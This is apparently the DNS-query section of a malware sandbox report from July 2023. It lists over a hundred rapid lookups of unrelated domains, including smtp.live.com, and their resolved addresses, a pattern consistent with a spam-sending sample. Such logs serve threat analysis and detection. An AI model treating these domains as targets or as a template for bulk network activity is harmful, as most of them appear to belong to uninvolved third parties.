                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.740041018 CEST8.8.8.8192.168.2.40x9822No error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.740041018 CEST8.8.8.8192.168.2.40x9822No error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.022355080 CEST8.8.8.8192.168.2.40x1794No error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.039593935 CEST8.8.8.8192.168.2.40x5736Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.105500937 CEST8.8.8.8192.168.2.40x7ffNo error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.269469976 CEST8.8.8.8192.168.2.40xb615Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.321279049 CEST8.8.8.8192.168.2.40xfd9cNo error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.366390944 CEST8.8.8.8192.168.2.40xe700No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.448839903 CEST8.8.8.8192.168.2.40x6488No error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.456420898 CEST8.8.8.8192.168.2.40xfd5aName error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.456921101 CEST8.8.8.8192.168.2.40xb864No error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.461582899 CEST8.8.8.8192.168.2.40x8ffeNo error (0)hbfuels.com85.233.160.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.484890938 CEST8.8.8.8192.168.2.40xa06eNo error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.489810944 CEST8.8.8.8192.168.2.40x7727Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.503063917 CEST8.8.8.8192.168.2.40x7e4bNo error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.503063917 CEST8.8.8.8192.168.2.40x7e4bNo error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.524382114 CEST8.8.8.8192.168.2.40x9e22Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.641895056 CEST8.8.8.8192.168.2.40x4d72No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.755816936 CEST8.8.8.8192.168.2.40xaaeaNo error (0)shesfit.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:28.755816936 CEST8.8.8.8192.168.2.40xaaeaNo error (0)shesfit.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.023641109 CEST8.8.8.8192.168.2.40x5bd4No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.135050058 CEST8.8.8.8192.168.2.40xbee8No error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.231709957 CEST8.8.8.8192.168.2.40xfdcaNo error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.256644011 CEST8.8.8.8192.168.2.40xb874No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.300539970 CEST8.8.8.8192.168.2.40xde8aNo error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.300539970 CEST8.8.8.8192.168.2.40xde8aNo error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.300869942 CEST8.8.8.8192.168.2.40x4a7dNo error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.361614943 CEST8.8.8.8192.168.2.40x7c98No error (0)ftchat.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.361614943 CEST8.8.8.8192.168.2.40x7c98No error (0)ftchat.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.438131094 CEST8.8.8.8192.168.2.40x26a5No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.605155945 CEST8.8.8.8192.168.2.40x5ad8No error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.605155945 CEST8.8.8.8192.168.2.40x5ad8No error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.878287077 CEST8.8.8.8192.168.2.40x83acNo error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:29.988996029 CEST8.8.8.8192.168.2.40xf1c7No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.007158995 CEST8.8.8.8192.168.2.40xd103Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.018970013 CEST8.8.8.8192.168.2.40xb615Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.113492966 CEST8.8.8.8192.168.2.40x6eafServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.188977957 CEST8.8.8.8192.168.2.40x20c1No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.188977957 CEST8.8.8.8192.168.2.40x20c1No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.213335991 CEST8.8.8.8192.168.2.40x5736Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.251393080 CEST8.8.8.8192.168.2.40xc7f0Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.265916109 CEST8.8.8.8192.168.2.40x62f7Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.421799898 CEST8.8.8.8192.168.2.40x5671No error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.431730032 CEST8.8.8.8192.168.2.40x502fNo error (0)shiner.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.431730032 CEST8.8.8.8192.168.2.40x502fNo error (0)shiner.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.504038095 CEST8.8.8.8192.168.2.40x9b76No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.553247929 CEST8.8.8.8192.168.2.40xe53eNo error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.695678949 CEST8.8.8.8192.168.2.40xbab1No error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.700867891 CEST8.8.8.8192.168.2.40x30cNo error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.700867891 CEST8.8.8.8192.168.2.40x30cNo error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.700867891 CEST8.8.8.8192.168.2.40x30cNo error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:30.768276930 CEST8.8.8.8192.168.2.40xf26cServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.022114038 CEST8.8.8.8192.168.2.40x928aNo error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.036504030 CEST8.8.8.8192.168.2.40xb615Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.112932920 CEST8.8.8.8192.168.2.40xe514No error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.112932920 CEST8.8.8.8192.168.2.40xe514No error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.417840004 CEST8.8.8.8192.168.2.40x208eNo error (0)bd-style.com103.112.69.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.421336889 CEST8.8.8.8192.168.2.40x1328No error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.421554089 CEST8.8.8.8192.168.2.40xbc13No error (0)yasuma.com61.200.81.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.425102949 CEST8.8.8.8192.168.2.40xe2a6No error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.425297022 CEST8.8.8.8192.168.2.40x29f8No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.427352905 CEST8.8.8.8192.168.2.40xff69No error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.427352905 CEST8.8.8.8192.168.2.40xff69No error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.427352905 CEST8.8.8.8192.168.2.40xff69No error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.428724051 CEST8.8.8.8192.168.2.40x7f3No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.428724051 CEST8.8.8.8192.168.2.40x7f3No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.428764105 CEST8.8.8.8192.168.2.40x42d4No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.428764105 CEST8.8.8.8192.168.2.40x42d4No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.428764105 CEST8.8.8.8192.168.2.40x42d4No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.428764105 CEST8.8.8.8192.168.2.40x42d4No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.432591915 CEST8.8.8.8192.168.2.40x9eeNo error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.434427977 CEST8.8.8.8192.168.2.40xd9bcNo error (0)ifesnet.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.434427977 CEST8.8.8.8192.168.2.40xd9bcNo error (0)ifesnet.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.435184956 CEST8.8.8.8192.168.2.40x14f0No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.435492039 CEST8.8.8.8192.168.2.40x9df5No error (0)adeesa.net172.67.209.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.435492039 CEST8.8.8.8192.168.2.40x9df5No error (0)adeesa.net104.21.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.436090946 CEST8.8.8.8192.168.2.40x6342No error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.439867973 CEST8.8.8.8192.168.2.40x1127No error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.453375101 CEST8.8.8.8192.168.2.40x38fdNo error (0)shteeble.com185.106.129.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.453864098 CEST8.8.8.8192.168.2.40x84c6Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.457318068 CEST8.8.8.8192.168.2.40x6098No error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.461097002 CEST8.8.8.8192.168.2.40xba99No error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.463745117 CEST8.8.8.8192.168.2.40x2671No error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.465806961 CEST8.8.8.8192.168.2.40x911eNo error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.465806961 CEST8.8.8.8192.168.2.40x911eNo error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.465806961 CEST8.8.8.8192.168.2.40x911eNo error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.465806961 CEST8.8.8.8192.168.2.40x911eNo error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.468806982 CEST8.8.8.8192.168.2.40x2ee9No error (0)rast.se93.188.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.484215975 CEST8.8.8.8192.168.2.40x16abNo error (0)sanfotek.net216.69.141.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.485160112 CEST8.8.8.8192.168.2.40x1966No error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.494324923 CEST8.8.8.8192.168.2.40xa920No error (0)gydrozo.ru91.220.211.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.495341063 CEST8.8.8.8192.168.2.40xb8c8No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.505718946 CEST8.8.8.8192.168.2.40xec52No error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.508481979 CEST8.8.8.8192.168.2.40x9cb7No error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.520289898 CEST8.8.8.8192.168.2.40xbf3cNo error (0)snf.it95.174.22.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.524844885 CEST8.8.8.8192.168.2.40xaaafNo error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.527097940 CEST8.8.8.8192.168.2.40x5d1bNo error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.528879881 CEST8.8.8.8192.168.2.40x70fdNo error (0)ludea.cz46.8.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.530153036 CEST8.8.8.8192.168.2.40x1ad5No error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.530153036 CEST8.8.8.8192.168.2.40x1ad5No error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.531738043 CEST8.8.8.8192.168.2.40x65d3No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.531738043 CEST8.8.8.8192.168.2.40x65d3No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.532350063 CEST8.8.8.8192.168.2.40x851bServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.533361912 CEST8.8.8.8192.168.2.40x3876No error (0)onzcda.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.547714949 CEST8.8.8.8192.168.2.40xfef5No error (0)vivastay.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.547714949 CEST8.8.8.8192.168.2.40xfef5No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.547714949 CEST8.8.8.8192.168.2.40xfef5No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.547714949 CEST8.8.8.8192.168.2.40xfef5No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.550750017 CEST8.8.8.8192.168.2.40x4647No error (0)kayoaiba.com154.213.117.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.559304953 CEST8.8.8.8192.168.2.40x4c86No error (0)adventist.ro49.12.155.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.559866905 CEST8.8.8.8192.168.2.40x3975No error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.560808897 CEST8.8.8.8192.168.2.40xfd63No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.560808897 CEST8.8.8.8192.168.2.40xfd63No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.560808897 CEST8.8.8.8192.168.2.40xfd63No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.560808897 CEST8.8.8.8192.168.2.40xfd63No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.563509941 CEST8.8.8.8192.168.2.40x19d4No error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.563509941 CEST8.8.8.8192.168.2.40x19d4No error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.565735102 CEST8.8.8.8192.168.2.40x43c2No error (0)nels.co.uk5.134.13.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.573594093 CEST8.8.8.8192.168.2.40x7fb4No error (0)k-nikko.com52.199.213.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.573594093 CEST8.8.8.8192.168.2.40x7fb4No error (0)k-nikko.com54.150.159.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.584952116 CEST8.8.8.8192.168.2.40xa154No error (0)acraloc.com185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.594988108 CEST8.8.8.8192.168.2.40x7f6eNo error (0)cutchie.com199.59.243.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.613749981 CEST8.8.8.8192.168.2.40x6364No error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.614922047 CEST8.8.8.8192.168.2.40x65c8No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.623970032 CEST8.8.8.8192.168.2.40xb3e4No error (0)sokuwan.net185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.623970032 CEST8.8.8.8192.168.2.40xb3e4No error (0)sokuwan.net185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.623970032 CEST8.8.8.8192.168.2.40xb3e4No error (0)sokuwan.net185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.625447989 CEST8.8.8.8192.168.2.40x400eNo error (0)zugseil.com92.42.191.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.633711100 CEST8.8.8.8192.168.2.40xec18No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.633711100 CEST8.8.8.8192.168.2.40xec18No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.661123037 CEST8.8.8.8192.168.2.40x7941No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.678313017 CEST8.8.8.8192.168.2.40xfa3fNo error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.678313017 CEST8.8.8.8192.168.2.40xfa3fNo error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.678313017 CEST8.8.8.8192.168.2.40xfa3fNo error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.702734947 CEST8.8.8.8192.168.2.40xa1beNo error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.720539093 CEST8.8.8.8192.168.2.40xd1e8No error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.723851919 CEST8.8.8.8192.168.2.40xf001No error (0)yhsll.com102.134.49.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.749819040 CEST8.8.8.8192.168.2.40x4f5dServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.776125908 CEST8.8.8.8192.168.2.40xe10eNo error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.778908968 CEST8.8.8.8192.168.2.40x8120No error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.789736032 CEST8.8.8.8192.168.2.40xf26cServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.798707008 CEST8.8.8.8192.168.2.40x4682No error (0)hbfuels.com85.233.160.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.798782110 CEST8.8.8.8192.168.2.40x5b8cNo error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.809293985 CEST8.8.8.8192.168.2.40x7e85No error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.821500063 CEST8.8.8.8192.168.2.40x8e47Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.824037075 CEST8.8.8.8192.168.2.40x4b42No error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.824151039 CEST8.8.8.8192.168.2.40xa483No error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.836529970 CEST8.8.8.8192.168.2.40x84b8No error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.844355106 CEST8.8.8.8192.168.2.40x5d1bNo error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.864758968 CEST8.8.8.8192.168.2.40xa8a2No error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.873903036 CEST8.8.8.8192.168.2.40x35a6No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.882538080 CEST8.8.8.8192.168.2.40x37fNo error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.887654066 CEST8.8.8.8192.168.2.40x75e8No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.904993057 CEST8.8.8.8192.168.2.40xdf3fNo error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.921631098 CEST8.8.8.8192.168.2.40x65eeNo error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.927834988 CEST8.8.8.8192.168.2.40x8fb0No error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.931008101 CEST8.8.8.8192.168.2.40xcaaeNo error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.931008101 CEST8.8.8.8192.168.2.40xcaaeNo error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.931008101 CEST8.8.8.8192.168.2.40xcaaeNo error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.931008101 CEST8.8.8.8192.168.2.40xcaaeNo error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.935376883 CEST8.8.8.8192.168.2.40xec99No error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.935376883 CEST8.8.8.8192.168.2.40xec99No error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.935376883 CEST8.8.8.8192.168.2.40xec99No error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
